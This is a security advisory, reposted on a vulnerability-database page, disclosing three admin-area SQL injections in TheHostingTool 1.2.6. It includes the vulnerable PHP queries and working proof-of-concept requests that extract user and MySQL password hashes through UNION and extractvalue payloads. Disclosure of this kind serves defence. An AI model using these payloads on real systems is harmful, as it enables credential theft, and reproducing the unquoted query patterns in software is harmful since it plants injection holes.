Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

TheHostingTool 1.2.6 SQL Injection

🗓️ 09 Nov 2015 00:00:00Reported by Tim CoenType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 16 Views

TheHostingTool 1.2.6 SQL Injection in 3 areas including ajax search, navbar update, and invoice payment status update

Code
`Security Advisory - Curesec Research Team  
  
1. Introduction  
  
Affected Product: TheHostingTool 1.2.6  
Fixed in: not fixed  
Fixed Version Link: n/a  
Vendor Website: https://thehostingtool.com/  
Vulnerability Type: SQL Injection  
Remote Exploitable: Yes  
Reported to vendor: 09/07/2015  
Disclosed to public: 10/07/2015  
Release mode: Full Disclosure  
CVE: n/a  
Credits Tim Coen of Curesec GmbH  
  
2. Description  
  
There are three SQL Injections in the admin area of TheHostingTool 1.2.6.  
  
The problem is that the defense against SQL Injection depends in part on the  
global GET and POST variables being sanitized using mysql_real_escape_string if  
accessed via postvar or getvar.  
  
This makes them relatively safe to use in a query if the parameter is  
surrounded by quotes. But for places where the parameter is not surrounded by  
quotes, this will not prevent SQL injection.  
  
Please note that admin credentials are required for all SQL injections shown  
here.  
  
3. Details  
  
SQL Injection 1  
  
The POST value "type" is used as the column name in a WHERE clause when using  
the ajax search. Encoding single quotes does not prevent SQL injection in this  
case.  
  
It should also be noted that letting the user choose the column of a LIKE query  
on a user table is not a good idea in general, as it will be easy to iterate  
passwords this way.  
  
Proof of Concept:  
  
  
POST http://localhost/ecommerce/THTv1.2.6/includes/ajax.php?function=search  
type=user` %3D 1 union all select 1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from tht_users %23&value=test  
  
Code:  
  
  
includes/ajax.php  
public function search() {  
global $main, $db, $style;  
if($_SESSION['logged']) {  
//echo '<script type="text/javascript" src="'.URL.'includes/javascript/jquerytooltip.js">';  
$type = $main->postvar['type'];  
$value = $main->postvar['value'];  
if($main->postvar['num']) {  
$show = $main->postvar['num'];  
} else {  
$show = 10;  
}  
if($main->postvar['page'] != 1) {  
$lower = $main->postvar['page'] * $show;  
$lower = $lower - $show;  
$upper = $lower + $show;  
} else {  
$lower = 0;  
$upper = $show;  
}  
$query = $db->query("SELECT * FROM `<PRE>users`, `<PRE>user_packs` WHERE `{$type}` LIKE '%{$value}%' AND <PRE>user_packs.userid = <PRE>users.id ORDER BY `{$type}` ASC LIMIT {$lower}, {$upper}");  
  
SQL Injection 2  
  
The POST value "order" is used in an update query of an ajax request. Single  
quotes are encoded, but the parameter is not surrounded by single quotes, thus  
making it unnecessary for an attacker to use single quotes, as they do not have  
to break out of the context of a string.  
  
Proof of Concept:  
  
  
POST http://localhost/ecommerce/THTv1.2.6/includes/ajax.php?function=navbar&action=order  
order=1-0 or extractvalue(1,concat(0x7e,(SELECT concat(password) FROM mysql.user limit 0,1)))  
  
Code:  
  
  
includes/ajax.php  
case "order":  
if(isset($P['order'])) {  
$ids = explode("-", $main->getvar['order']);  
$i = 0;  
foreach($ids as $id) {  
echo "updating: " . "UPDATE `navbar` SET `order` = {$i} WHERE `id` = {$id}";  
$db->query("UPDATE `  
  
navbar` SET `order` = {$i} WHERE `id` = {$id}");  
$i++;  
}  
}  
break;  
  
SQL Injection 3  
  
When updating the payment status of invoices, the "iid" GET parameter is put  
directly into multiple queries.  
  
Proof of Concept:  
  
  
http://ecommerce/THTv1.2.6/admin/?page=invoices&pay&iid=1' or extractvalue(1,concat(0x7e,(SELECT concat(password) FROM mysql.user limit 0,1))) %23  
  
Code:  
  
  
includes/class_invoice.php  
public function set_paid($iid) { # Pay the invoice by giving invoice id  
global $db, $server;  
$query = $db->query("UPDATE `<PRE>invoices` SET `is_paid` = '1' WHERE `id` = '{$iid}'");  
$query2 = $db->query("SELECT `uid` FROM `<PRE>invoices` WHERE `id` = '{$iid}' LIMIT 1");  
$data2 = $db->fetch_array($query2);  
$query3 = $db->query("SELECT `id` FROM `<PRE>user_packs` WHERE `userid` = '{$data2['uid']}'");  
$data3 = $db->fetch_array($query3);  
$server->unsuspend($data3['id']);  
return $query;  
}  
  
admin/pages/invoices.php  
$invoice->set_paid($_GET['iid']);  
  
4. Solution  
  
This issue has not been fixed  
  
5. Report Timeline  
  
09/07/2015 Informed Vendor about Issue (no reply)  
09/22/2015 Reminded Vendor of disclosure date (no reply)  
10/07/2015 Disclosed to public  
  
  
Blog Reference:  
http://blog.curesec.com/article/blog/TheHostingTool-126-Multiple-SQL-Injection-77.html  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
09 Nov 2015 00:00Current
0.1Low risk
Vulners AI Score0.1
thehostingtool 1.2.6sql injectionajax searchnavbar updateinvoice payment status.
16